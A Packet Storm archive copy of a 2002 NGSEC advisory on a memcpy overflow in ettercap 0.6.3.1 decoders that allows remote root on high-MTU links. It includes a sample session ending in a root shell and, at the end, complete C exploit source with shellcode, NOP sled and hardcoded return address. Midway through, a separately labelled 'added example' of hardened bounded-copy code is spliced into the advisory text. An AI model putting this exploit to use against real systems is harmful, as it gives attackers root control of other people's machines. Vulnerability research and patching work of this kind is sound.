ettercap-0.6.3.txt

2002-02-19T00:00:00
ID PACKETSTORM:25765
Type packetstorm
Reporter FJ Serna
Modified 2002-02-19T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
  
Next Generation Security Technologies  
http://www.ngsec.com  
Security Advisory  
  
  
Title: Ettercap, remote root compromise  
ID: NGSEC-2002-1  
Application: ettercap 0.6.3.1 and older (http://ettercap.sourceforge.net)  
Date: 05/02/2002  
Status: Vendor Contacted, new fixed version released.  
Platform: Linux on interfaces with MTU > 2000  
Author: Fermín J. Serna <fjserna@ngsec.com>  
Location: http://www.ngsec.com/docs/advisories/NGSEC-2002-1.txt  
  
  
Overview:  
- ---------  
  
As ettercap's home page says, "Ettercap is a multipurpose
sniffer/interceptor/logger for switched LAN". Due to improper use of the
memcpy() function, anyone can crash ettercap and execute code as the root
user.
  
The vulnerability has been confirmed and exploited in ettercap version
0.6.3.1. Older versions may be vulnerable too.
  
This vulnerability only exists in the Linux version, because on *BSD and MacOS X
ettercap only works on Ethernet devices.
  
Technical description:  
- ----------------------  
  
Ettercap is composed of decoders which look for users, passwords,
communities and the like.
  
Several decoders (mysql, irc, ...) suffer the following problem:  
  
memcpy(collector, payload, data_to_ettercap->datalen);  
  
Collector is declared as:  
  
u_char collector[MAX_DATA];  
  
Where MAX_DATA is:  
  
#define MAX_DATA 2000  
  
Datalen is the length of the data (after the TCP/UDP header) read from the
interface. So on interfaces where the MTU is higher than 2000 you can exploit
ettercap. Since normal Ethernet has an MTU of 1500, this bug cannot be
exploited there because ettercap does not support defragmentation, but
ettercap may still be crashed with a forged packet (ip->tot_len > MAX_DATA).
  
Here are common MTU and interface types:  
  
65535 Hyperchannel  
17914 16 Mbit/sec token ring  
8166 Token Bus (IEEE 802.4)  
4464 4 Mbit/sec token ring (IEEE 802.5)  
1500 Ethernet  
1500 PPP (typical; can vary widely)  
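As an added example, not part of the advisory or of ettercap's own code, the unchecked copy named above is shown beside a bounded version that clamps the copy to the collector and reports the truncation, together with a link-MTU check of the kind a defender would use to see which interfaces can deliver a single frame larger than MAX_DATA. The `struct packet` layout, the 40-byte IPv4+TCP header figure and the demo helper names are assumptions of this example.

```c
#include <stddef.h>
#include <string.h>

#define MAX_DATA 2000              /* collector size named in the advisory */
#define MIN_IP_TCP_HEADERS 40      /* assumption: 20-byte IPv4 + 20-byte TCP, no options */

/* Constructed stand-in for the decoder's input: only the field the advisory names. */
struct packet {
    const unsigned char *payload;
    size_t datalen;                /* bytes after the TCP/UDP header, as read from the wire */
};

/* The advisory's bug, kept here only for contrast and never called:
 *   memcpy(collector, payload, data_to_ettercap->datalen);
 * datalen comes straight from the packet and is never compared with MAX_DATA. */

/* Hardened copy: never write past the collector and tell the caller when the
 * payload was longer than the buffer, so the decoder can log or drop it. */
size_t collect_payload(unsigned char collector[MAX_DATA],
                       const struct packet *pkt, int *truncated)
{
    size_t n = pkt->datalen;
    *truncated = 0;
    if (n > MAX_DATA) {
        n = MAX_DATA;
        *truncated = 1;
    }
    memcpy(collector, pkt->payload, n);
    return n;
}

/* Largest TCP payload one unfragmented frame on this link can carry (header assumption above). */
size_t max_tcp_payload(size_t mtu)
{
    return mtu > MIN_IP_TCP_HEADERS ? mtu - MIN_IP_TCP_HEADERS : 0;
}

/* Can a single frame on this link hand the decoder more than MAX_DATA bytes? */
int link_exceeds_collector(size_t mtu)
{
    return max_tcp_payload(mtu) > MAX_DATA;
}

/* Demo harness: a constructed payload of the requested length (capped at 4096 bytes)
 * pushed through the hardened copy. Returns bytes copied; *truncated reports the clamp. */
static unsigned char constructed_payload[4096];

size_t demo_bytes_copied(size_t datalen, int *truncated)
{
    unsigned char collector[MAX_DATA];
    struct packet pkt;

    if (datalen > sizeof constructed_payload)
        datalen = sizeof constructed_payload;
    memset(constructed_payload, 'A', datalen);
    pkt.payload = constructed_payload;
    pkt.datalen = datalen;
    return collect_payload(collector, &pkt, truncated);
}
```

With the MTU values from the table above, `link_exceeds_collector()` is false for Ethernet and PPP (1500) and true for loopback (16436), token ring (17914) and Hyperchannel (65535), which matches the advisory's statement that only interfaces with an MTU above 2000 expose the overflow; a 2200-byte constructed payload is clamped to 2000 bytes by `collect_payload()` with the truncation flag set.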
  
  
Exploit for this vulnerability can be found at  
  
http://www.ngsec.com/dowloads/exploits/ettercap-x.c  
  
Sample exploitation is also possible on loopback interfaces (MTU 16436):
  
piscis:~# ettercap -NszC -i lo &  
[1] 21887  
piscis:~# ./ettercap-x 0 | nc localhost 3306  
ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>  
Next Generation Security Technologies  
http://www.ngsec.com  
  
punt!  
piscis:~# telnet localhost 36864  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
id;  
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),10(wheel)  
  
  
Recommendations:
- ---------------  
  
Upgrade to a newer ettercap version.
Run ettercap in a secure environment.
  
  
More advisories at: http://www.ngsec.com/advisories/  
PGP Key: http://www.ngsec.com/labs.asc  
  
(c)Copyright 2002 NGSEC. All rights reserved.  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.0.6 (GNU/Linux)  
Comment: Made with pgp4pine 1.76  
  
iD8DBQE8awI5KrwoKcQl8Y4RAl5HAJsHgiOuhE08kArQNKrOPPhQDkW6swCfUkAH  
307ifuCsbg5mxFlTvhr4jbY=  
=o2T9  
-----END PGP SIGNATURE-----  
  
  
/*   
* ettercap-0.6.3.1 remote root xploit   
*  
* By: Fermín J. Serna <fjserna@ngsec.com>  
* Next Generation Security Technologies  
* http://www.ngsec.com  
*  
* DESCRIPTION:  
* ============  
*  
* Several decoders (mysql, irc, ...) suffer the following problem:  
*  
* memcpy(collector, payload, data_to_ettercap->datalen);  
*  
* collector is declared as:   
*  
* u_char collector[MAX_DATA];  
*   
* where MAX_DATA is:  
*  
* #define MAX_DATA 2000  
*  
* So on interfaces where MTU is higher than 2000 you can exploit   
* ettercap. Nop, normal ethernets have MTU:1500 ;P  
*  
* Here are common MTU and interface types:  
*   
* 65535 Hyperchannel  
* 17914 16 Mbit/sec token ring  
* 8166 Token Bus (IEEE 802.4)  
* 4464 4 Mbit/sec token ring (IEEE 802.5)  
* 1500 Ethernet  
* 1500 PPP (typical; can vary widely)  
*  
* Sample exploitation is also possible on loopback interfaces (MTU 16436):
*  
* piscis:~# ettercap -NszC -i lo &  
* [1] 21887  
* piscis:~# ./ettercap-x 0 | nc localhost mysql  
* ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>  
* Next Generation Security Technologies  
* http://www.ngsec.com   
*  
* punt!  
* piscis:~# telnet localhost 36864  
* Trying 127.0.0.1...  
* Connected to localhost.  
* Escape character is '^]'.  
* id;  
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
*  
* Madrid, 5/02/2002  
*  
*/   
  
  
#include <stdio.h>
#include <stdlib.h>   /* atoi() */
#include <string.h>
  
#define NUM_ADDR 100  
#define NOP 0x41  
#define BUFF_SIZE 2200  
#define RET_ADDR 0xbfffea58  
#define OFFSET 0  
  
char shellcode[]=  
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"  
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"  
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"  
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"  
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"  
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"  
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"  
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"  
"/bin/sh";  
  
int main(int argc, char **argv) {  
char buffer[BUFF_SIZE];  
char *ch_ptr;  
unsigned long *lg_ptr;  
int aux;  
int offset=OFFSET;  
  
fprintf(stderr,"ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>\n");  
fprintf(stderr,"Next Generation Security Technologies\n");  
fprintf(stderr,"http://www.ngsec.com\n\n");  
  
  
if (argc==2) offset=atoi(argv[1]);  
  
memset(buffer,0,sizeof(buffer));  
  
ch_ptr=buffer;  
memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);  
ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;  
memcpy(ch_ptr,shellcode,strlen(shellcode));  
ch_ptr+=strlen(shellcode);  
lg_ptr=(unsigned long *)ch_ptr;  
for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;  
ch_ptr=(char *)lg_ptr;  
*ch_ptr='\0';  
  
printf("%s",buffer);  
  
return(0);  
  
}  
  
  